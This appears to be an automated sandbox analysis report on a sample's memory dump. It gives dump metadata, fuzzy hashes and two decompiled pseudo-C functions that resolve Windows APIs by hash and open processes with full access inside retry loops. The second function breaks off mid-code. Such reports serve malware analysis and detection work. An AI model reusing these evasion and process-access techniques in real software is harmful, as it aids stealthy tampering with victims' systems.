0x6f4b1c05
0x6f4b1c06
0x6f4b1c07
0x6f4b1c08
0x6f4b1c0b
0x6f4b1c0f
0x6f4b1c13
0x6f4b1c1a
0x6f4b1c2c
0x6f4b1c42
0x6f4b1c4d
0x6f4b1c4e
0x6f4b1c4f
0x6f4b1c50
0x6f4b1c51
0x6f4b1c54
0x6f4b1c58
0x6f4b1c5c
0x6f4b1c63
0x6f4b1c75
0x6f4b1c8b
0x6f4b1c96
0x6f4b1c97
0x6f4b1c98
0x6f4b1c99
0x6f4b1c9a
0x6f4b1c9d
0x6f4b1ca0
0x6f4b1ca1
0x6f4b1ca2
0x6f4b1ca9
0x6f4b1cac
0x6f4b1cb7
0x6f4b1cbe
0x6f4b1cc7
0x6f4b1ccf
0x6f4b1cd6
0x6f4b1cdf
0x6f4b1ce7
0x6f4b1cee
0x6f4b1cf7
0x6f4b1cff
0x6f4b1d04
0x6f4b1d0d
0x6f4b1d15
0x6f4b1d2a

Strings

8nsK, xrefs: 6F4B1900

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 2a7932e6c6a5a25de8aa4b8d45f4fddf79b0fb5a60967ce895be7638b41b632e
Instruction ID: 8361061b93559108640aad3f570dd86aefc8fa26a41241395f3ab8559255a887
Opcode Fuzzy Hash: 2a7932e6c6a5a25de8aa4b8d45f4fddf79b0fb5a60967ce895be7638b41b632e
Instruction Fuzzy Hash: 313270764147069AC705DF60CC509AFB7A0AFA1218F108B1DF58D6A1E3FF71E98AC6A1

Uniqueness

Uniqueness Score: -1.00%

Function 6F4BA4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6F4BA4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6F4BB658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6F4BF4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6F4BF654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6F4C2234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6F4BF654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6F4BF584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6F4BF584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6f4cb808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6F4C3064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6F4BF4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6F4BF4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6F4BB5C4(_t439 + 0x34);
											E6F4BB5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6F4BB5C4(_t439 + 0x34);
										E6F4BB5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6F4BF4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6F4BCA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6F4BC280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6F4BF828(_t439 + 0x14, E6F4BF4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6F4BF4BC(_t439 + 0x14, E6F4BF4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6F4C3064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6F4BF828(_t439 + 0x40, E6F4BF4CC(_t439 + 0x3c) + 4);
											 *(E6F4BF4BC(_t439 + 0x40, E6F4BF4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6F4BCD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6F4BF4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6F4BF4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6F4BAC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6F4BCD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6F4BF4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6F4BF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6F4BF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6F4BF4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6F4BF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6F4C38F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6F4BF4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6F4BF828( *((intOrPtr*)(_t439 + 8)), E6F4BF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6F4BF4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6F4BF4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6F4BF4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6F4BF4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6F4C38F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6F4BF4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6F4BF828( *((intOrPtr*)(_t439 + 4)), E6F4BF4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6F4BF828( *((intOrPtr*)(_t439 + 8)), E6F4BF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6F4BF4BC( *((intOrPtr*)(_t439 + 8)), E6F4BF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6F4BF828( *((intOrPtr*)(_t439 + 4)), E6F4BF4CC( *_t439) + 4);
								 *(E6F4BF4BC( *((intOrPtr*)(_t439 + 4)), E6F4BF4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6F4BF4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6F4C3064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6F4BF4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6F4BF828( *((intOrPtr*)(_t439 + 8)), E6F4BF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6F4BF4BC( *((intOrPtr*)(_t439 + 8)), E6F4BF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6F4BF4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6F4BF828( *((intOrPtr*)(_t439 + 4)), E6F4BF4CC( *_t439) + 4);
										 *(E6F4BF4BC( *((intOrPtr*)(_t439 + 4)), E6F4BF4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6F4BF4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6F4BF4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6F4BF4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6F4BF4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6F4BF4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6F4BF4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6F4C38F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6F4BF4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6F4BF828( *((intOrPtr*)(_t439 + 4)), E6F4BF4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6F4C3064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6F4BF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6F4BF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6F4BF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6F4BF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6F4BF4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6F4C38F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6F4BF4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6F4BF828( *((intOrPtr*)(_t439 + 8)), E6F4BF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6F4BF4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6f4ba4f2
0x6f4ba4f4
0x6f4ba4ff
0x6f4ba505
0x6f4ba509
0x6f4ba50e
0x6f4ba514
0x6f4ba524
0x00000000
0x6f4ba526
0x6f4ba526
0x6f4ba531
0x6f4ba531
0x6f4baaaf
0x6f4baab1
0x6f4baab2
0x6f4baaf1
0x6f4baaf5
0x6f4bab03
0x6f4bab11
0x6f4bab11
0x6f4baafc
0x6f4bab17
0x6f4bab1c
0x00000000
0x6f4bab1c
0x6f4bab00
0x6f4bab01
0x00000000
0x6f4ba53b
0x6f4ba53b
0x6f4ba53f
0x6f4ba646
0x6f4ba646
0x6f4ba64b
0x6f4ba75c
0x6f4ba760
0x6f4ba765
0x6f4ba769
0x6f4ba893
0x6f4ba895
0x6f4ba899
0x6f4ba8a2
0x6f4ba8ab
0x6f4ba8af
0x6f4ba8b8
0x6f4ba8bf
0x6f4ba8c0
0x6f4ba8c4
0x6f4ba8c8
0x6f4ba8cc
0x6f4ba8ce
0x6f4baa38
0x6f4baa38
0x6f4baa40
0x6f4baa58
0x6f4baa5a
0x6f4baa5c
0x6f4baa96
0x6f4baa96
0x6f4baa98
0x6f4baa98
0x6f4baa9b
0x6f4baab6
0x6f4baaca
0x6f4baacd
0x6f4baad2
0x6f4baadd
0x6f4baade
0x6f4baae1
0x6f4baae3
0x6f4baaec
0x00000000
0x6f4baaec
0x6f4baa9d
0x6f4baaa1
0x6f4baaaa
0x00000000
0x6f4baaaa
0x6f4baa6d
0x6f4baa7d
0x6f4baa81
0x6f4baa81
0x6f4baa84
0x6f4baa87
0x6f4baa8a
0x6f4baa90
0x00000000
0x00000000
0x00000000
0x6f4baa92
0x6f4ba8d6
0x6f4ba8d6
0x6f4ba8d8
0x6f4ba8dc
0x6f4ba8e1
0x6f4ba8e3
0x6f4ba8e7
0x6f4ba8ea
0x6f4ba8f2
0x6f4ba8f4
0x00000000
0x00000000
0x6f4ba90b
0x6f4ba926
0x6f4ba928
0x6f4ba93b
0x6f4ba93d
0x6f4ba93f
0x6f4ba95a
0x6f4ba95a
0x6f4ba95e
0x6f4ba960
0x00000000
0x00000000
0x6f4ba962
0x6f4ba965
0x6f4ba986
0x6f4ba9a5
0x6f4ba9ab
0x6f4ba9ae
0x6f4ba9b3
0x6f4ba9b4
0x6f4ba9b8
0x00000000
0x00000000
0x6f4ba9c0
0x6f4ba9c0
0x6f4ba9c2
0x6f4ba9ce
0x6f4ba9da
0x6f4ba9e4
0x6f4ba9e7
0x6f4ba9ea
0x6f4ba9ee
0x6f4ba9f5
0x6f4ba9f9
0x6f4ba9fd
0x6f4ba9fe
0x6f4baa02
0x6f4baa07
0x6f4baa0c
0x6f4baa10
0x6f4baa14
0x6f4baa1a
0x6f4baa20
0x6f4baa26
0x6f4baa2c
0x6f4baa31
0x6f4baa32
0x6f4baa32
0x00000000
0x6f4ba9c2
0x00000000
0x6f4ba965
0x6f4ba943
0x6f4ba954
0x6f4ba956
0x6f4ba958
0x00000000
0x00000000
0x00000000
0x6f4ba958
0x6f4ba96b
0x00000000
0x6f4ba96b
0x6f4ba76f
0x6f4ba772
0x6f4ba774
0x00000000
0x00000000
0x6f4ba77c
0x6f4ba77c
0x6f4ba77e
0x6f4ba77e
0x6f4ba78f
0x6f4ba791
0x6f4ba794
0x00000000
0x00000000
0x6f4ba88a
0x6f4ba88b
0x6f4ba88d
0x00000000
0x00000000
0x00000000
0x6f4ba88d
0x6f4ba79a
0x6f4ba79d
0x6f4ba7a7
0x6f4ba7ac
0x6f4ba7ae
0x6f4ba7b4
0x6f4ba7bb
0x6f4ba7bf
0x6f4ba7c4
0x6f4ba7c8
0x6f4bac03
0x6f4bac17
0x6f4bac3a
0x6f4bac3f
0x6f4bac3f
0x6f4ba7df
0x6f4ba7e4
0x6f4ba7e4
0x6f4ba7e4
0x6f4ba7e4
0x6f4ba7ea
0x6f4ba7ef
0x6f4ba7f1
0x6f4ba7f6
0x6f4ba7fd
0x6f4ba802
0x6f4ba804
0x6f4babc1
0x6f4babd2
0x6f4babec
0x6f4babf1
0x6f4babf1
0x6f4ba81a
0x6f4ba81f
0x6f4ba81f
0x6f4ba81f
0x6f4ba81f
0x6f4ba833
0x6f4ba851
0x6f4ba856
0x6f4ba866
0x6f4ba883
0x6f4ba885
0x6f4ba885
0x00000000
0x6f4ba79d
0x6f4ba653
0x6f4ba653
0x6f4ba655
0x6f4ba65c
0x6f4ba66a
0x6f4ba66c
0x6f4ba66f
0x6f4ba676
0x6f4ba678
0x6f4ba6a9
0x6f4ba6b8
0x6f4ba6ba
0x6f4ba6bc
0x6f4ba6da
0x6f4ba6dc
0x6f4ba6de
0x6f4ba6f1
0x6f4ba710
0x6f4ba716
0x6f4ba719
0x6f4ba730
0x6f4ba74c
0x6f4ba74e
0x6f4ba74e
0x6f4ba74e
0x6f4ba74e
0x6f4ba6de
0x00000000
0x6f4ba6bc
0x6f4ba67c
0x6f4ba67c
0x6f4ba67e
0x6f4ba68f
0x6f4ba691
0x6f4ba693
0x00000000
0x00000000
0x6f4ba69f
0x6f4ba6a0
0x6f4ba6a7
0x00000000
0x00000000
0x00000000
0x6f4ba6a7
0x6f4ba695
0x6f4ba698
0x00000000
0x00000000
0x6f4ba751
0x6f4ba751
0x6f4ba752
0x6f4ba752
0x00000000
0x6f4ba545
0x6f4ba547
0x6f4ba547
0x6f4ba549
0x6f4ba550
0x6f4ba55e
0x6f4ba560
0x6f4ba564
0x6f4ba568
0x6f4ba56a
0x6f4ba598
0x6f4ba59b
0x6f4ba5a0
0x6f4ba5a4
0x6f4ba5a9
0x6f4ba5b0
0x6f4ba5b5
0x6f4ba5b7
0x6f4bab7e
0x6f4bab8f
0x6f4babaf
0x6f4babb4
0x6f4babb4
0x6f4ba5cd
0x6f4ba5d2
0x6f4ba5d2
0x6f4ba5d2
0x6f4ba5d2
0x6f4ba5e4
0x6f4ba5e6
0x6f4ba5e8
0x6f4ba5f9
0x6f4ba5f9
0x6f4ba5ff
0x6f4ba604
0x6f4ba608
0x6f4ba60e
0x6f4ba615
0x6f4ba61a
0x6f4ba61c
0x6f4bab32
0x6f4bab43
0x6f4bab64
0x6f4bab69
0x6f4bab69
0x6f4ba633
0x6f4ba638
0x6f4ba638
0x6f4ba638
0x6f4ba638
0x6f4ba63b
0x6f4ba63b
0x00000000
0x6f4ba63b
0x6f4ba56e
0x6f4ba56e
0x6f4ba570
0x6f4ba581
0x6f4ba583
0x6f4ba585
0x00000000
0x00000000
0x6f4ba591
0x6f4ba592
0x6f4ba596
0x00000000
0x00000000
0x00000000
0x6f4ba596
0x6f4ba587
0x6f4ba58a
0x00000000
0x00000000
0x6f4ba63c
0x6f4ba63c
0x6f4ba63d
0x6f4ba63d
0x00000000
0x6f4ba549
0x6f4ba53f

Strings

, xrefs: 6F4BAAF7

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: a0b7fbb9d97dcfe32a2833304e4f28d3cf1209dc63d41c8c1e39a7be0f6f820c
Instruction ID: 23958e90d0147b4fabdf4d02ae63fe2587d1c1addfc36cac36f997779deae4df
Opcode Fuzzy Hash: a0b7fbb9d97dcfe32a2833304e4f28d3cf1209dc63d41c8c1e39a7be0f6f820c
Instruction Fuzzy Hash: D0127D765093019FC704DF64C880E6FB7E5AF95714F008A2DE999976A3EB30ED41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F4B8428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6F4B8428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6F4BB658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6F4BF4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6F4BF654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6F4C2234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6F4BF654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6F4BF584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6F4BF584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6F4BF4BC(_t449 + 0x14, 0);
									_t180 = E6F4C2908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6F4BB5C4(_t449 + 0x34);
										E6F4BB5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6F4BF4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6F4BF4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6F4BB5C4(_t449 + 0x34);
										E6F4BB5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6F4BCA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6F4BC280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6F4BF828(_t449 + 0x14, E6F4BF4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6F4BF4BC(_t449 + 0x14, E6F4BF4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
